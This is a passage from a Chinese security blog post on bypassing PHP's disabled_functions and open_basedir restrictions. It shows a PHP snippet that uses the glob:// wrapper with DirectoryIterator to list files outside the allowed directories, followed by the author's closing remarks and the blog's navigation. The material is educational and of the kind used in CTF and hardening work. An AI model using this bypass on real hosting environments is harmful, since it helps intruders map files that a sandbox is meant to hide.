<h4 id="glob-bypass"><a href="#glob-bypass" class="headerlink" title="glob bypass"></a>glob bypass</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">printf(<span class="string">'&lt;b&gt;open_basedir : %s &lt;/b&gt;&lt;br /&gt;'</span>, ini_get(<span class="string">'open_basedir'</span>));</span><br><span class="line">$file_list = <span class="keyword">array</span>();</span><br><span class="line"><span class="comment">// normal files</span></span><br><span class="line">$it = <span class="keyword">new</span> DirectoryIterator(<span class="string">"glob:///*"</span>);</span><br><span class="line"><span class="keyword">foreach</span>($it <span class="keyword">as</span> $f) &#123;</span><br><span class="line">    $file_list[] = $f-&gt;__toString();</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// special files (starting with a dot(.))</span></span><br><span class="line">$it = <span class="keyword">new</span> DirectoryIterator(<span class="string">"glob:///.*"</span>);</span><br><span class="line"><span class="keyword">foreach</span>($it <span class="keyword">as</span> $f) &#123;</span><br><span class="line">    $file_list[] = $f-&gt;__toString();</span><br><span class="line">&#125;</span><br><span class="line">sort($file_list);</span><br><span class="line"><span class="keyword">foreach</span>($file_list <span class="keyword">as</span> $f)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&#123;$f&#125;&lt;br/&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>上面是比较常见的open_basedir bypass，也还有好几种bypass.</p>
<h3 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h3><p>上面在bypass disabled_functions我少写了一个mod_cgi的bypass，在bypass open_basedir中少写了一个fpm bypass的方法，主要是想这两个方法都很有意思，准备单独拿出来写一下，在以后的文章中会看到他们的身影。</p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/10/09/Bypass-disabled-functions-open-basedir-php/" data-id="ckabsu37t000fkkvrad636pl2" class="article-share-link" data-share="baidu" data-title="Bypass disabled_functions &amp; open_basedir-php">Share</a>
      

      
        <a href="http://yoursite.com/2019/10/09/Bypass-disabled-functions-open-basedir-php/#ds-thread" class="article-comment-link">Comments</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/10/20/Roarctf2019/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Roarctf2019
        
      </div>
    </a>
  
  
    <a href="/2019/10/09/Thinkphp-6-0-x-pop%E9%93%BE%E5%88%86%E6%9E%90/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Thinkphp 6.0.x pop链分析</div>
    </a>
  
</nav>

  
</article>


  <section id="comments">
    <div id="ds-thread" class="ds-thread" data-thread-key="2019/10/09/Bypass-disabled-functions-open-basedir-php/" data-title="Bypass disabled_functions &amp; open_basedir-php" data-url="http://yoursite.com/2019/10/09/Bypass-disabled-functions-open-basedir-php/"></div>
  </section>
</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">30</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">7</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">26</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" rel="tag">生活随笔</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 12.5px;">Crypto</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 17.5px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">生活随笔</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">随笔</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a><span class="archive-list-count">21</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/05/13/Apache-Common-Collections-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">Apache Common Collections 反序列化分析学习</a>
          </li>
        
          <li>
            <a href="/2020/05/12/intigriti-Easter-XSS-challenge/">intigriti Easter XSS challenge</a>
          </li>
        
          <li>
            <a href="/2020/04/22/VolgaCTF-2020-Qualifier-Web/">VolgaCTF 2020 Qualifier-Web</a>
          </li>
        
          <li>
            <a href="/2020/04/15/DOM-Clobbering-Attack/">DOM Clobbering Attack</a>
          </li>
        
          <li>
            <a href="/2020/04/09/Javascript%E4%B8%AD%E5%8F%98%E9%87%8F%E5%A3%B0%E6%98%8E%E5%B8%A6%E6%9D%A5%E7%9A%84Tags-Broken/">Javascript中变量声明带来的Tags Broken</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="http://arvinxiang.com" target="_blank">主题作者</a>
          </li>
        
          <li>
            <a href="http://reqianduan.com" target="_blank">热前端</a>
          </li>
        
          <li>
            <a href="http://yuancheng.work" target="_blank">远程.work</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->

<!-- 多说公共js代码 start -->
<script type="text/javascript">
var duoshuoQuery = {short_name:"reqianduan"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0]
     || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
  </script>
<!-- 多说公共js代码 end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
